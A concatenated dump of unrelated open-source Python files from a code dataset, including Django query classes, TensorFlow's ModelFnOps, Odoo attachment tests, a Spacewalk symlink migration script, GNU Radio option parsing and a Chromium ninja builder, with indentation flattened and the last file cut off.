for alias, full_name in aliases.items():
dr = Driver(alias)
self.assertEqual(full_name, str(dr))
| bsd-3-clause |
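Outside the test harness above, the same alias table can be exercised directly; this assumes GDAL is installed and Django is configured:
# --- illustrative sketch, not part of the dataset row above ---
from django.contrib.gis.gdal import Driver

for alias in ('sHp', 'TigER/linE'):
    print(alias, '->', str(Driver(alias)))   # 'ESRI Shapefile', 'TIGER'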
zycdragonball/tensorflow | tensorflow/contrib/learn/python/learn/estimators/model_fn.py | 21 | 11316 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and methods related to model_fn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib.framework import get_graph_from_inputs
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import metric_key
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.python.estimator import model_fn as core_model_fn_lib
from tensorflow.python.estimator.export import export_output as core_export_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.training import session_run_hook
class ModeKeys(object):
"""Standard names for model modes.
The following standard keys are defined:
* `TRAIN`: training mode.
* `EVAL`: evaluation mode.
* `INFER`: inference mode.
"""
TRAIN = 'train'
EVAL = 'eval'
INFER = 'infer'
@classmethod
def validate(cls, key):
if key not in (cls.TRAIN, cls.EVAL, cls.INFER):
raise ValueError('Invalid mode %s.' % key)
class ModelFnOps(
collections.namedtuple('ModelFnOps', [
'predictions', 'loss', 'train_op', 'eval_metric_ops',
'output_alternatives', 'training_chief_hooks', 'training_hooks',
'scaffold', 'mode'
])):
"""Ops returned from a model_fn."""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metric_ops=None,
output_alternatives=None,
training_chief_hooks=None,
training_hooks=None,
scaffold=None):
"""Creates a validated `ModelFnOps` instance.
For a multi-headed model, the predictions dict here will contain the outputs
of all of the heads. However: at serving time, requests will be made
specifically for one or more heads, and the RPCs used for these requests may
differ by problem type (i.e., regression, classification, other). The
purpose of the output_alternatives dict is to aid in exporting a SavedModel
from which such head-specific queries can be served. These
output_alternatives will be combined with input_alternatives (see
`saved_model_export_utils`) to produce a set of `SignatureDef`s specifying
the valid requests that can be served from this model.
For a single-headed model, it is still advisable to provide
output_alternatives with a single entry, because this is how the problem
type is communicated for export and serving. If output_alternatives is not
given, the resulting SavedModel will support only one head of unspecified
type.
Args:
mode: One of `ModeKeys`. Specifies if this is training, evaluation or
prediction.
predictions: Predictions `Tensor` or dict of `Tensor`.
loss: Training loss `Tensor`.
train_op: Op for the training step.
eval_metric_ops: Dict of metric results keyed by name. The values of the
dict are the results of calling a metric function, such as `Tensor`.
output_alternatives: a dict of
`{submodel_name: (problem_type, {tensor_name: Tensor})}`, where
`submodel_name` is a submodel identifier that should be consistent
across the pipeline (here likely taken from the name of each `Head`,
for models that use them), `problem_type` is a `ProblemType`,
`tensor_name` is a symbolic name for an output Tensor possibly but not
necessarily taken from `PredictionKey`, and `Tensor` is the
corresponding output Tensor itself.
training_chief_hooks: A list of `SessionRunHook` objects that will be
run on the chief worker during training.
training_hooks: A list of `SessionRunHook` objects that will be run on
all workers during training.
scaffold: A `tf.train.Scaffold` object that can be used to set
initialization, saver, and more to be used in training.
Returns:
A validated `ModelFnOps` object.
Raises:
ValueError: If validation fails.
"""
ModeKeys.validate(mode)
# Assert all ops are from the same graph.
get_graph_from_inputs((predictions, loss, train_op))
# Validate train_op.
if train_op is None:
if mode == ModeKeys.TRAIN:
raise ValueError('Missing train_op.')
elif not isinstance(train_op, ops.Operation):
# TODO(ptucker): Should this be allowed? Consider raising error.
train_op = ops.convert_to_tensor(train_op).op
# Validate loss.
if loss is None:
if mode in (ModeKeys.TRAIN, ModeKeys.EVAL):
raise ValueError('Missing loss.')
else:
loss = ops.convert_to_tensor(loss)
loss_shape = loss.get_shape()
if loss_shape.num_elements() not in (None, 1):
raise ValueError('Loss must be scalar: %s.' % loss)
if not loss_shape.is_compatible_with(tensor_shape.scalar()):
loss = array_ops.reshape(loss, [])
# Validate predictions.
if predictions is None:
if mode == ModeKeys.INFER or mode == ModeKeys.EVAL:
raise ValueError('Missing predictions.')
else:
if isinstance(predictions, dict):
predictions = {
k: contrib_framework.convert_to_tensor_or_sparse_tensor(v)
for k, v in six.iteritems(predictions)
}
else:
predictions = contrib_framework.convert_to_tensor_or_sparse_tensor(
predictions)
# Validate eval_metric_ops
if eval_metric_ops is None:
eval_metric_ops = {}
else:
if not isinstance(eval_metric_ops, dict):
raise ValueError('eval_metric_ops must be a dict.')
# Validate hooks
if training_chief_hooks is None:
training_chief_hooks = []
if training_hooks is None:
training_hooks = []
for hook in training_hooks + training_chief_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks returned from model_fn must be '
'SessionRunHook instances, got instance of %s: %s' %
(type(hook), hook))
return super(ModelFnOps, cls).__new__(
cls,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metric_ops,
output_alternatives=output_alternatives,
training_chief_hooks=training_chief_hooks,
training_hooks=training_hooks,
scaffold=scaffold,
mode=mode)
def estimator_spec(self, default_serving_output_alternative_key=None):
"""Creates an equivalent `EstimatorSpec`.
Args:
default_serving_output_alternative_key: Required for multiple heads. If
you have multiple entries in `output_alternatives` dict (comparable to
multiple heads), `EstimatorSpec` requires a default head that will be
used if a Servo request does not explicitly mention which head to infer
on. Pass the key of the output alternative here that you want to
designate as default. A separate ExportOutput for this default head
will be added to the export_outputs dict with the special key
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY, unless there is
already an entry in output_alternatives with this special key.
Returns:
Instance of `EstimatorSpec` that is equivalent to this `ModelFnOps`
Raises:
ValueError: If problem type is unknown.
"""
def _scores(output_tensors):
scores = output_tensors.get(prediction_key.PredictionKey.SCORES)
if scores is None:
scores = output_tensors.get(prediction_key.PredictionKey.PROBABILITIES)
return scores
def _classes(output_tensors): # pylint: disable=missing-docstring
classes = output_tensors.get(prediction_key.PredictionKey.CLASSES)
if classes is None:
logging.warning(
'classes is None, Servo inference will not have class ids.')
return None
elif classes.dtype != dtypes.string:
# Servo classification can only serve string classes
logging.warning(
'classes is not string, Servo inference will not have class ids.')
return None
return classes
def _export_output(problem_type, predictions): # pylint: disable=missing-docstring
if problem_type == constants.ProblemType.LINEAR_REGRESSION:
return core_export_lib.RegressionOutput(_scores(predictions))
if (problem_type == constants.ProblemType.CLASSIFICATION or
problem_type == constants.ProblemType.LOGISTIC_REGRESSION):
return core_export_lib.ClassificationOutput(
scores=_scores(predictions), classes=_classes(predictions))
if problem_type == constants.ProblemType.UNSPECIFIED:
return core_export_lib.PredictOutput(predictions)
raise ValueError('Unknown problem_type=%s' % problem_type)
# Converts output_alternatives
export_outputs_dict = None
if self.output_alternatives:
output_alternatives = self.output_alternatives
# Adds default output_alternative if needed.
if (len(output_alternatives) > 1 and
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY not in
output_alternatives):
output_alternatives = output_alternatives.copy()
output_alternatives[
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY] = (
output_alternatives[default_serving_output_alternative_key])
export_outputs_dict = {key: _export_output(*val) for key, val in
output_alternatives.items()}
def _get_eval_metric_ops():
"""Returns self.eval_metric_ops without loss metric."""
result = {}
for key, value in six.iteritems(self.eval_metric_ops):
if key != metric_key.MetricKey.LOSS:
result[key] = value
return result
return core_model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=_get_eval_metric_ops(),
export_outputs=export_outputs_dict,
training_chief_hooks=self.training_chief_hooks,
training_hooks=self.training_hooks,
scaffold=self.scaffold)
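# NOTE(editor): hedged usage sketch, not part of the original module. It only
# illustrates the `output_alternatives` shape described in the docstrings above
# and the conversion to a core `EstimatorSpec`; the 'head_a' key and the
# `predictions` argument (assumed to be a dict of name -> Tensor) are
# illustrative assumptions.
def _example_model_fn_ops(predictions):
  """Builds a ModelFnOps for inference and converts it to an EstimatorSpec."""
  ops = ModelFnOps(
      mode=ModeKeys.INFER,
      predictions=predictions,
      output_alternatives={
          'head_a': (constants.ProblemType.UNSPECIFIED, predictions),
      })
  # With a single output alternative, no default key needs to be designated.
  return ops.estimator_spec()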
| apache-2.0 |
lastcoin/lastcoin | share/qt/extract_strings_qt.py | 2945 | 1844 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
OUT_CPP="src/qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
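# Example (illustrative): given xgettext output such as
#   msgid "Insufficient funds"
#   msgstr ""
# parse_po() returns [(['"Insufficient funds"'], ['""'])] -- the surrounding
# quotes are kept in each entry, which is why EMPTY above is defined as ['""'].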
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
| mit |
doganaltunbay/odoo | openerp/addons/base/tests/test_ir_attachment.py | 433 | 3536 | import hashlib
import os
import openerp
import openerp.tests.common
HASH_SPLIT = 2 # FIXME: testing implementation details is not a good idea
class test_ir_attachment(openerp.tests.common.TransactionCase):
def setUp(self):
super(test_ir_attachment, self).setUp()
registry, cr, uid = self.registry, self.cr, self.uid
self.ira = registry('ir.attachment')
self.filestore = self.ira._filestore(cr, uid)
# Blob1
self.blob1 = 'blob1'
self.blob1_b64 = self.blob1.encode('base64')
blob1_hash = hashlib.sha1(self.blob1).hexdigest()
self.blob1_fname = blob1_hash[:HASH_SPLIT] + '/' + blob1_hash
# Blob2
blob2 = 'blob2'
self.blob2_b64 = blob2.encode('base64')
def test_01_store_in_db(self):
registry, cr, uid = self.registry, self.cr, self.uid
# force storing in database
registry('ir.config_parameter').set_param(cr, uid, 'ir_attachment.location', 'db')
# with 'ir_attachment.location' set to 'db', attachments must be stored in the database
a1 = self.ira.create(cr, uid, {'name': 'a1', 'datas': self.blob1_b64})
a1_read = self.ira.read(cr, uid, [a1], ['datas'])
self.assertEqual(a1_read[0]['datas'], self.blob1_b64)
a1_db_datas = self.ira.browse(cr, uid, a1).db_datas
self.assertEqual(a1_db_datas, self.blob1_b64)
def test_02_store_on_disk(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
self.assertEqual(a2_store_fname, self.blob1_fname)
self.assertTrue(os.path.isfile(os.path.join(self.filestore, a2_store_fname)))
def test_03_no_duplication(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
a3 = self.ira.create(cr, uid, {'name': 'a3', 'datas': self.blob1_b64})
a3_store_fname = self.ira.browse(cr, uid, a3).store_fname
self.assertEqual(a3_store_fname, a2_store_fname)
def test_04_keep_file(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a3 = self.ira.create(cr, uid, {'name': 'a3', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
a2_fn = os.path.join(self.filestore, a2_store_fname)
self.ira.unlink(cr, uid, [a3])
self.assertTrue(os.path.isfile(a2_fn))
# delete a2; the file is removed once no attachment references it
self.ira.unlink(cr, uid, [a2])
self.assertFalse(os.path.isfile(a2_fn))
def test_05_change_data_change_file(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
a2_fn = os.path.join(self.filestore, a2_store_fname)
self.assertTrue(os.path.isfile(a2_fn))
self.ira.write(cr, uid, [a2], {'datas': self.blob2_b64})
self.assertFalse(os.path.isfile(a2_fn))
new_a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
self.assertNotEqual(a2_store_fname, new_a2_store_fname)
new_a2_fn = os.path.join(self.filestore, new_a2_store_fname)
self.assertTrue(os.path.isfile(new_a2_fn))
| agpl-3.0 |
sam-tsai/django | django/db/models/sql/subqueries.py | 210 | 7963 | """
Query subclasses which provide extra functionality beyond simple data retrieval.
"""
from django.core.exceptions import FieldError
from django.db import connections
from django.db.models.query_utils import Q
from django.db.models.sql.constants import (
CURSOR, GET_ITERATOR_CHUNK_SIZE, NO_RESULTS,
)
from django.db.models.sql.query import Query
from django.utils import six
__all__ = ['DeleteQuery', 'UpdateQuery', 'InsertQuery', 'AggregateQuery']
class DeleteQuery(Query):
"""
Delete queries are done through this class, since they are more constrained
than general queries.
"""
compiler = 'SQLDeleteCompiler'
def do_query(self, table, where, using):
self.tables = [table]
self.where = where
cursor = self.get_compiler(using).execute_sql(CURSOR)
return cursor.rowcount if cursor else 0
def delete_batch(self, pk_list, using, field=None):
"""
Set up and execute delete queries for all the objects in pk_list.
More than one physical query may be executed if there are a
lot of values in pk_list.
"""
# number of objects deleted
num_deleted = 0
if not field:
field = self.get_meta().pk
for offset in range(0, len(pk_list), GET_ITERATOR_CHUNK_SIZE):
self.where = self.where_class()
self.add_q(Q(
**{field.attname + '__in': pk_list[offset:offset + GET_ITERATOR_CHUNK_SIZE]}))
num_deleted += self.do_query(self.get_meta().db_table, self.where, using=using)
return num_deleted
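# Illustrative note: with GET_ITERATOR_CHUNK_SIZE of, say, 100, a pk_list of
# 250 ids is deleted with three consecutive DELETE queries (100 + 100 + 50
# rows), and the returned count is the total across all of them.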
def delete_qs(self, query, using):
"""
Delete the queryset in one SQL query (if possible). For simple queries
this is done by copying the query.query.where to self.query, for
complex queries by using subquery.
"""
innerq = query.query
# Make sure the inner query has at least one table in use.
innerq.get_initial_alias()
# The same for our new query.
self.get_initial_alias()
innerq_used_tables = [t for t in innerq.tables
if innerq.alias_refcount[t]]
if not innerq_used_tables or innerq_used_tables == self.tables:
# There is only the base table in use in the query.
self.where = innerq.where
else:
pk = query.model._meta.pk
if not connections[using].features.update_can_self_select:
# We can't do the delete using subquery.
values = list(query.values_list('pk', flat=True))
if not values:
return
return self.delete_batch(values, using)
else:
innerq.clear_select_clause()
innerq.select = [
pk.get_col(self.get_initial_alias())
]
values = innerq
self.where = self.where_class()
self.add_q(Q(pk__in=values))
cursor = self.get_compiler(using).execute_sql(CURSOR)
return cursor.rowcount if cursor else 0
class UpdateQuery(Query):
"""
Represents an "update" SQL query.
"""
compiler = 'SQLUpdateCompiler'
def __init__(self, *args, **kwargs):
super(UpdateQuery, self).__init__(*args, **kwargs)
self._setup_query()
def _setup_query(self):
"""
Runs on initialization and after cloning. Any attributes that would
normally be set in __init__ should go in here, instead, so that they
are also set up after a clone() call.
"""
self.values = []
self.related_ids = None
if not hasattr(self, 'related_updates'):
self.related_updates = {}
def clone(self, klass=None, **kwargs):
return super(UpdateQuery, self).clone(klass,
related_updates=self.related_updates.copy(), **kwargs)
def update_batch(self, pk_list, values, using):
self.add_update_values(values)
for offset in range(0, len(pk_list), GET_ITERATOR_CHUNK_SIZE):
self.where = self.where_class()
self.add_q(Q(pk__in=pk_list[offset: offset + GET_ITERATOR_CHUNK_SIZE]))
self.get_compiler(using).execute_sql(NO_RESULTS)
def add_update_values(self, values):
"""
Convert a dictionary of field name to value mappings into an update
query. This is the entry point for the public update() method on
querysets.
"""
values_seq = []
for name, val in six.iteritems(values):
field = self.get_meta().get_field(name)
direct = not (field.auto_created and not field.concrete) or not field.concrete
model = field.model._meta.concrete_model
if not direct or (field.is_relation and field.many_to_many):
raise FieldError(
'Cannot update model field %r (only non-relations and '
'foreign keys permitted).' % field
)
if model is not self.get_meta().model:
self.add_related_update(model, field, val)
continue
values_seq.append((field, model, val))
return self.add_update_fields(values_seq)
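# Illustrative note: a public call such as SomeModel.objects.filter(...).update(
# headline='x') ends up building an UpdateQuery and calling
# add_update_values({'headline': 'x'}); 'SomeModel' and 'headline' are
# hypothetical names used only for this example.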
def add_update_fields(self, values_seq):
"""
Turn a sequence of (field, model, value) triples into an update query.
Used by add_update_values() as well as the "fast" update path when
saving models.
"""
self.values.extend(values_seq)
def add_related_update(self, model, field, value):
"""
Adds (name, value) to an update query for an ancestor model.
Updates are coalesced so that we only run one update query per ancestor.
"""
self.related_updates.setdefault(model, []).append((field, None, value))
def get_related_updates(self):
"""
Returns a list of query objects: one for each update required to an
ancestor model. Each query will have the same filtering conditions as
the current query but will only update a single table.
"""
if not self.related_updates:
return []
result = []
for model, values in six.iteritems(self.related_updates):
query = UpdateQuery(model)
query.values = values
if self.related_ids is not None:
query.add_filter(('pk__in', self.related_ids))
result.append(query)
return result
class InsertQuery(Query):
compiler = 'SQLInsertCompiler'
def __init__(self, *args, **kwargs):
super(InsertQuery, self).__init__(*args, **kwargs)
self.fields = []
self.objs = []
def clone(self, klass=None, **kwargs):
extras = {
'fields': self.fields[:],
'objs': self.objs[:],
'raw': self.raw,
}
extras.update(kwargs)
return super(InsertQuery, self).clone(klass, **extras)
def insert_values(self, fields, objs, raw=False):
"""
Set up the insert query from the 'fields' and 'objs' arguments: 'fields'
lists the model fields to insert and 'objs' the objects providing their
values. If 'raw' is True, the values
are inserted directly into the query, rather than passed as SQL
parameters. This provides a way to insert NULL and DEFAULT keywords
into the query, for example.
"""
self.fields = fields
self.objs = objs
self.raw = raw
class AggregateQuery(Query):
"""
An AggregateQuery takes another query as a parameter to the FROM
clause and only selects the elements in the provided list.
"""
compiler = 'SQLAggregateCompiler'
def add_subquery(self, query, using):
self.subquery, self.sub_params = query.get_compiler(using).as_sql(
with_col_aliases=True,
subquery=True,
)
| bsd-3-clause |
renner/spacewalk | scripts/update_symlinks.py | 8 | 5799 | #!/usr/bin/python
#
# Copyright (c) 2008--2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Test for blob updates
#
"""
This script is meant to be used by spacewalk users upgrading from 1.0 to 1.1.
The schema storing the symlinks target path was updated between spacewalk 1.0 to 1.1
from a blob in rhnConfigContent to symlink_target_filename_id in rhnConfigInfo.
This script extracts symlink paths that were previously stored as blobs in rhnConfigContent
and then creates an entry in rhnConfigFileName with that path and sets the
rhnConfigInfo.symlink_target_filename_id.
It acquires the database information from rhn.conf
"""
import sys
sys.path.insert(0, "/usr/share/rhn")
from common.rhnConfig import CFG, initCFG
from server import rhnSQL
from os.path import isabs
def setup_db():
initCFG('server.satellite')
db_backend = CFG.DB_BACKEND
db_host = CFG.DB_HOST
db_port = CFG.DB_PORT
db_user = CFG.DB_user
db_password = CFG.DB_PASSWORD
database = CFG.DB_NAME
rhnSQL.initDB(backend=db_backend, host=db_host, port=db_port,
username=db_user, password=db_password, database=database)
def main():
setup_db()
print "================="
print "Updating Symbolic Links"
q = """select cr.id as rev_id,
ccon.id as content_id,
ccon.contents,
cr.CONFIG_INFO_ID as info_id,
cf.id as file_id,
cc.org_id,
wc.name as org_name,
ci.SELINUX_CTX as selinux,
cfn.path as path,
ci.SYMLINK_TARGET_FILENAME_ID as info_target,
nvl( (select path from rhnConfigFileName where id = ci.SYMLINK_TARGET_FILENAME_ID), 'None') as name_target
from rhnConfigContent ccon
inner join rhnConfigRevision cr on cr.config_content_id = ccon.id
inner join rhnConfigFile cf on cr.CONFIG_FILE_ID = cf.id
inner join rhnConfigFileName cfn on cfn.id = cf.config_file_name_id
inner join rhnConfigInfo ci on ci.id = cr.CONFIG_INFO_ID
inner join rhnConfigChannel cc on cf.CONFIG_CHANNEL_ID = cc.id
inner join web_customer wc on cc.org_id = wc.id
where
cr.CONFIG_FILE_TYPE_ID in (select id from rhnConfigFileType where label='symlink')"""
h = rhnSQL.prepare(q)
h.execute()
results = h.fetchall_dict()
if not results:
print "Update completed."
print "================="
return
contents = []
for row in results:
contents.append( dict(revision_id = row["rev_id"],
file_id = row ["file_id"],
info_id = row ["info_id"],
content_id = row ["content_id"],
path = row['path'],
info_target = row['info_target'],
name_target = row['name_target'],
selinux = row['selinux'],
org_id = row['org_id'],
org_name = row['org_name'],
symlink_target = rhnSQL.read_lob(row["contents"])))
update_query = """update rhnConfigRevision set config_info_id =
lookup_config_info(null, null, null, :selinux, lookup_config_filename(:symlink_target)) where id = :revision_id"""
null_symlink_update_query = """update rhnConfigRevision set config_info_id =
lookup_config_info(null, null, null, :selinux, null) where id = :revision_id"""
update_cr = """ update rhnConfigRevision set config_content_id = null where id = :revision_id"""
delete_content = """ delete from rhnConfigContent where id = :content_id"""
format = """
Path: [%(path)s]
Symbolic link:[%(symlink_target)s]
Update URL: https://<FQDN>/rhn/configuration/file/FileDetails.do?cfid=%(file_id)d&crid=%(revision_id)d
Organization Id : [%(org_id)d]
Organization Name : [%(org_name)s]
"""
bad_items = list()
for item in contents:
if item['symlink_target'] is None:
bad_items.append(item)
rhnSQL.prepare(null_symlink_update_query).execute(**item)
else:
if not isabs(item['symlink_target']) or len(item['symlink_target']) >= 1024:
bad_items.append(item)
item['symlink_target'] = item['symlink_target'][:1024]
rhnSQL.prepare(update_query).execute(**item)
rhnSQL.prepare(update_cr).execute(**item)
rhnSQL.prepare(delete_content).execute(**item)
print format % item
rhnSQL.commit()
rhnSQL.closeDB()
print "%d rows updated." % len(contents)
print "Update completed"
print "================="
msg = """
The following symbolic link paths are either null, not absolute, or 1024 characters or longer.
Entries have been created in the DB, but their values still have to be corrected in the Web UI.
Please go to the provided URL, log in as a user with the config admin/org admin role in the specified organization,
and update the target path value accordingly.
"""
if bad_items:
print msg
for item in bad_items:
print format % item
if __name__ == '__main__':
sys.exit(main() or 0)
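# NOTE(editor): illustrative invocation (assumption): run this script once on
# the Spacewalk server after the 1.0 -> 1.1 schema upgrade, e.g.
#   python update_symlinks.py
# Database credentials are read from rhn.conf via initCFG('server.satellite').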
| gpl-2.0 |
teamCarel/EyeTracker | src/shared_modules/calibration_routines/calibration_plugin_base.py | 2 | 2391 | '''
(*)~---------------------------------------------------------------------------
Pupil - eye tracking platform
Copyright (C) 2012-2017 Pupil Labs
Distributed under the terms of the GNU
Lesser General Public License (LGPL v3.0).
See COPYING and COPYING.LESSER for license details.
---------------------------------------------------------------------------~(*)
'''
from plugin import Plugin
import logging
logger = logging.getLogger(__name__)
class Calibration_Plugin(Plugin):
'''base class for all calibration routines'''
uniqueness = 'by_base_class'
def __init__(self,g_pool):
super().__init__(g_pool)
self.g_pool.active_calibration_plugin = self
self.pupil_confidence_threshold = 0.6
self.active = False
def on_notify(self,notification):
'''Handles calibration notifications
Reacts to notifications:
``calibration.should_start``: Starts the calibration procedure
``calibration.should_stop``: Stops the calibration procedure
Emits notifications:
``calibration.started``: Calibration procedure started
``calibration.stopped``: Calibration procedure stopped
``calibration.failed``: Calibration failed
``calibration.successful``: Calibration succeeded
Args:
notification (dictionary): Notification dictionary
'''
if notification['subject'].startswith('calibration.should_start'):
if self.active:
logger.warning('Calibration already running.')
else:
self.start()
self.notify_all({'subject':'calibration.started'})
elif notification['subject'].startswith('calibration.should_stop'):
if self.active:
self.notify_all({'subject':'calibration.stopped'})
self.stop()
else:
logger.warning('Calibration already stopped.')
def toggle(self,_=None):
if self.active:
self.notify_all({'subject':'calibration.should_stop'})
else:
self.notify_all({'subject':'calibration.should_start'})
def start(self):
raise NotImplementedError()
self.notify_all({'subject':'calibration.started'})
def stop(self):
raise NotImplementedError()
self.notify_all({'subject':'calibration.stopped'})
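# NOTE(editor): hedged sketch of a minimal subclass; 'Dummy_Calibration' is an
# illustrative assumption and not one of Pupil's shipped calibration plugins.
class Dummy_Calibration(Calibration_Plugin):
    """Toggles its active flag only; the started/stopped notifications are
    emitted by the base class' on_notify handler."""
    def start(self):
        self.active = True
    def stop(self):
        self.active = False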
| lgpl-3.0 |
balister/gnuradio | gnuradio-runtime/python/gnuradio/eng_option.py | 61 | 2090 | #
# Copyright 2004 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
'''Add support for engineering notation to optparse.OptionParser'''
from copy import copy
from optparse import Option, OptionValueError
import eng_notation
def check_eng_float (option, opt, value):
try:
return eng_notation.str_to_num(value)
except:
raise OptionValueError (
"option %s: invalid engineering notation value: %r" % (opt, value))
def check_intx (option, opt, value):
try:
return int (value, 0)
except:
raise OptionValueError (
"option %s: invalid integer value: %r" % (opt, value))
def check_subdev (option, opt, value):
"""
Value has the form: (A|B)(:0|1|2)?
Returns:
a 2-tuple (0|1, 0|1|2)
"""
d = { 'A' : (0, 0), 'A:0' : (0, 0), 'A:1' : (0, 1), 'A:2' : (0, 2),
'B' : (1, 0), 'B:0' : (1, 0), 'B:1' : (1, 1), 'B:2' : (1, 2) }
try:
return d[value.upper()]
except:
raise OptionValueError(
"option %s: invalid subdev: '%r', must be one of %s" % (opt, value, ', '.join(sorted(d.keys()))))
class eng_option (Option):
TYPES = Option.TYPES + ("eng_float", "intx", "subdev")
TYPE_CHECKER = copy (Option.TYPE_CHECKER)
TYPE_CHECKER["eng_float"] = check_eng_float
TYPE_CHECKER["intx"] = check_intx
TYPE_CHECKER["subdev"] = check_subdev
| gpl-3.0 |
mkaluza/external_chromium_org | tools/cr/cr/actions/ninja.py | 23 | 2458 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A module to add ninja support to cr."""
import os
import cr
_PHONY_SUFFIX = ': phony'
_LINK_SUFFIX = ': link'
class NinjaBuilder(cr.Builder):
"""An implementation of Builder that uses ninja to do the actual build."""
# Some basic configuration installed if we are enabled.
ENABLED = cr.Config.From(
NINJA_BINARY=os.path.join('{DEPOT_TOOLS}', 'ninja'),
NINJA_JOBS=200,
NINJA_PROCESSORS=12,
GOMA_DIR=os.path.join('{GOOGLE_CODE}', 'goma'),
)
# A placeholder for the system detected configuration
DETECTED = cr.Config('DETECTED')
def __init__(self):
super(NinjaBuilder, self).__init__()
self._targets = []
def Build(self, context, targets, arguments):
build_arguments = [target.build_target for target in targets]
build_arguments.extend(arguments)
cr.Host.Execute(
context,
'{NINJA_BINARY}',
'-C{CR_BUILD_DIR}',
'-j{NINJA_JOBS}',
'-l{NINJA_PROCESSORS}',
*build_arguments
)
def Clean(self, context, targets, arguments):
build_arguments = [target.build_target for target in targets]
build_arguments.extend(arguments)
cr.Host.Execute(
context,
'{NINJA_BINARY}',
'-C{CR_BUILD_DIR}',
'-tclean',
*build_arguments
)
def GetTargets(self, context):
"""Overridden from Builder.GetTargets."""
if not self._targets:
try:
context.Get('CR_BUILD_DIR', raise_errors=True)
except KeyError:
return self._targets
output = cr.Host.Capture(
context,
'{NINJA_BINARY}',
'-C{CR_BUILD_DIR}',
'-ttargets',
'all'
)
for line in output.split('\n'):
line = line.strip()
if line.endswith(_PHONY_SUFFIX):
target = line[:-len(_PHONY_SUFFIX)].strip()
self._targets.append(target)
elif line.endswith(_LINK_SUFFIX):
target = line[:-len(_LINK_SUFFIX)].strip()
self._targets.append(target)
return self._targets
@classmethod
def DetectNinja(cls):
